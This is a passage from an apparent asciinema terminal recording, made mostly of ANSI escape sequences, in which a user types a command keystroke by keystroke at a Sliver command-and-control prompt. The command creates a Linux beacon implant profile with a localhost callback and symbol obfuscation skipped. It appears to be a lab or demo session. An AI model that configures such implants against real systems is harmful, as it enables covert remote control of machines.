\u001b[39m\u001b[22mnew beacon \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[29D"] +[17.454557, "o", "\u001b[9C\u001b[214D\u001b[29C\u001b[?25h"] +[17.820587, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[17.839363, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[17.842543, "o", "\u001b[214D\u001b[1A\u001b[30D\u001b[9C\u001b[214D\u001b[30C\u001b[?25h"] +[18.114188, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[18.125107, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[18.126115, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[31D\u001b[9C\u001b[214D\u001b[31C\u001b[?25h"] +[18.199168, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[18.202271, "o", "\u001b[6n"] +[18.222313, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[18.224541, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[32D\u001b[9C\u001b[214D\u001b[32C\u001b[?25h"] +[18.364335, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[18.371159, "o", "\u001b[6n"] +[18.39355, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22ml\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[18.397048, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[33D\u001b[9C\u001b[214D\u001b[33C\u001b[?25h"] +[18.550245, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[18.552318, "o", "\u001b[6n"] +[18.577845, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlo\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[34D\u001b[9C\u001b[214D\u001b[34C\u001b[?25h"] +[18.682037, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[18.690165, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mloc\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[18.690826, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[35D\u001b[9C\u001b[214D\u001b[35C\u001b[?25h"] +[18.74857, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[18.751605, "o", "\u001b[6n"] +[18.755354, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mloca\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[18.75673, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[36D\u001b[9C\u001b[214D\u001b[36C\u001b[?25h"] +[18.840517, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[18.844334, "o", "\u001b[6n"] +[18.852031, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocal\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A"] +[18.852999, "o", "\u001b[37D\u001b[9C\u001b[214D\u001b[37C\u001b[?25h"] +[19.081403, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[19.096541, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalh\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[19.097207, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[38D\u001b[9C\u001b[214D\u001b[38C\u001b[?25h"] +[19.141943, "o", "\u001b[?25l\u001b[214D"] +[19.144542, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[19.151576, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalho\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[19.152308, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[39D\u001b[9C\u001b[214D\u001b[39C\u001b[?25h"] +[19.21028, "o", "\u001b[?25l"] +[19.21066, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[19.212807, "o", "\u001b[6n"] +[19.217594, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhos\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D"] +[19.218241, "o", "\u001b[1A\u001b[40D\u001b[9C\u001b[214D\u001b[40C\u001b[?25h"] +[19.305258, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[19.307084, "o", "\u001b[6n"] +[19.315792, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[19.317316, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[41D\u001b[9C\u001b[214D\u001b[41C\u001b[?25h"] +[19.391585, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[19.403349, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[19.404598, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[42D\u001b[9C\u001b[214D\u001b[42C\u001b[?25h"] +[19.612738, "o", "\u001b[?25l\u001b[214D"] +[19.616541, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[19.642732, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[19.64458, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[43D\u001b[9C\u001b[214D\u001b[43C\u001b[?25h"] +[19.727533, "o", "\u001b[?25l"] +[19.728195, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[19.732597, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[44D\u001b[9C\u001b[214D\u001b[44C\u001b[?25h"] +[19.952229, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[19.960693, "o", "\u001b[6n"] +[19.97101, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--o\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[45D\u001b[9C\u001b[214D\u001b[45C\u001b[?25h"] +[20.038298, "o", "\u001b[?25l\u001b[214D"] +[20.042619, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[20.06721, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[20.07031, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[46D\u001b[9C\u001b[214D\u001b[46C\u001b[?25h"] +[20.127136, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[20.131351, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[20.131943, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[47D\u001b[9C\u001b[214D\u001b[47C\u001b[?25h"] +[20.242249, "o", "\u001b[?25l\u001b[214D"] +[20.243637, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[20.243916, "o", "\u001b[6n"] +[20.26165, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22ml\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[20.262736, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[48D\u001b[9C\u001b[214D\u001b[48C\u001b[?25h"] +[20.313606, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[20.317055, "o", "\u001b[6n"] +[20.320717, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mli\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[49D\u001b[9C"] +[20.32112, "o", "\u001b[214D\u001b[49C\u001b[?25h"] +[20.408108, "o", "\u001b[?25l"] +[20.41512, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[20.433072, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlin\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[20.434122, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[50D\u001b[9C\u001b[214D\u001b[50C\u001b[?25h"] +[20.542523, "o", "\u001b[?25l"] +[20.551107, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[20.564786, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinu\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[20.565551, "o", "\u001b[214D\u001b[1A\u001b[51D\u001b[9C\u001b[214D\u001b[51C\u001b[?25h"] +[20.701255, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[20.715508, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[20.717429, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[52D\u001b[9C\u001b[214D\u001b[52C\u001b[?25h"] +[20.770094, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[20.776074, "o", "\u001b[6n"] +[20.781738, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[20.782205, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[53D\u001b[9C\u001b[214D\u001b[53C\u001b[?25h"] +[21.202495, "o", "\u001b[?25l"] +[21.210484, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[21.248211, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[54D\u001b[9C\u001b[214D\u001b[54C\u001b[?25h"] +[21.34017, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[21.349775, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[21.351375, "o", "\u001b[214D\u001b[1A\u001b[55D\u001b[9C\u001b[214D\u001b[55C\u001b[?25h"] +[21.586474, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[21.602434, "o", "\u001b[6n"] +[21.60975, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--s\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[56D"] +[21.6112, "o", "\u001b[9C\u001b[214D\u001b[56C\u001b[?25h"] +[21.674727, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[21.678428, "o", "\u001b[6n"] +[21.683171, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--sk\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[21.684096, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[57D\u001b[9C\u001b[214D\u001b[57C\u001b[?25h"] +[21.757695, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[21.760769, "o", "\u001b[6n"] +[21.765683, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--ski\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[21.766586, "o", "\u001b[214D\u001b[1A\u001b[58D\u001b[9C\u001b[214D\u001b[58C\u001b[?25h"] +[21.930732, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[21.938185, "o", "\u001b[6n"] +[21.964049, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[21.966035, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[59D\u001b[9C\u001b[214D\u001b[59C\u001b[?25h"] +[22.278315, "o", "\u001b[?25l"] +[22.280322, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[22.290182, "o", "\u001b[6n"] +[22.318137, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[22.319121, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[60D\u001b[9C\u001b[214D\u001b[60C\u001b[?25h"] +[22.461397, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[22.473765, "o", "\u001b[6n"] +[22.497463, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-s\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[22.497924, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[61D\u001b[9C\u001b[214D\u001b[61C\u001b[?25h"] +[22.663035, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[22.663779, "o", "\u001b[6n"] +[22.678647, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-sy\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[22.679292, "o", "\u001b[214D\u001b[1A\u001b[62D\u001b[9C\u001b[214D\u001b[62C\u001b[?25h"] +[22.914689, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[22.918631, "o", "\u001b[6n"] +[22.95403, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-sym\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[22.956042, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[63D\u001b[9C\u001b[214D\u001b[63C\u001b[?25h"] +[23.259777, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[23.271795, "o", "\u001b[6n"] +[23.280231, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symb\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[23.282586, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[64D\u001b[9C\u001b[214D\u001b[64C\u001b[?25h"] +[23.339497, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[23.342791, "o", "\u001b[6n"] +[23.34779, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbo\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[23.34816, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[65D\u001b[9C\u001b[214D\u001b[65C\u001b[?25h"] +[23.558234, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[23.573464, "o", "\u001b[6n"] +[23.590504, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbol\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[23.591214, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[66D\u001b[9C\u001b[214D\u001b[66C\u001b[?25h"] +[23.692589, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[23.703079, "o", "\u001b[6n"] +[23.712181, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[67D\u001b[9C\u001b[214D\u001b[67C\u001b[?25h"] +[23.843185, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[23.84961, "o", "\u001b[6n"] +[23.872613, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[23.874165, "o", "\u001b[214D\u001b[1A\u001b[68D\u001b[9C\u001b[214D\u001b[68C\u001b[?25h"] +[24.245191, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[24.253415, "o", "\u001b[6n"] +[24.283722, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[24.285435, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[69D\u001b[9C\u001b[214D\u001b[69C\u001b[?25h"] +[24.373216, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[24.373665, "o", "\u001b[6n"] +[24.381376, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[24.384282, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[70D\u001b[9C\u001b[214D\u001b[70C\u001b[?25h"] +[24.547481, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[24.55465, "o", "\u001b[6n"] +[24.573528, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--d\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[24.573764, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[71D\u001b[9C\u001b[214D\u001b[71C\u001b[?25h"] +[24.612342, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[24.615739, "o", "\u001b[6n"] +[24.620298, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--de\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[24.621017, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[72D\u001b[9C\u001b[214D\u001b[72C\u001b[?25h"] +[24.692276, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[24.697214, "o", "\u001b[6n"] +[24.701743, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--deb\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[24.702391, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[73D\u001b[9C\u001b[214D\u001b[73C\u001b[?25h"] +[24.732726, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[24.735639, "o", "\u001b[6n"] +[24.739556, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debu\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[24.740285, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[74D\u001b[9C\u001b[214D\u001b[74C\u001b[?25h"] +[24.931458, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[24.9338, "o", "\u001b[6n"] +[24.94215, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[24.942744, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[75D\u001b[9C\u001b[214D\u001b[75C\u001b[?25h"] +[25.041803, "o", "\u001b[?25l"] +[25.042296, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[25.045083, "o", "\u001b[6n"] +[25.048784, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[25.049191, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[76D\u001b[9C\u001b[214D\u001b[76C\u001b[?25h"] +[25.425308, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[25.427535, "o", "\u001b[6n"] +[25.436812, "o", "\u001b[1m\u001b[32mprofiles 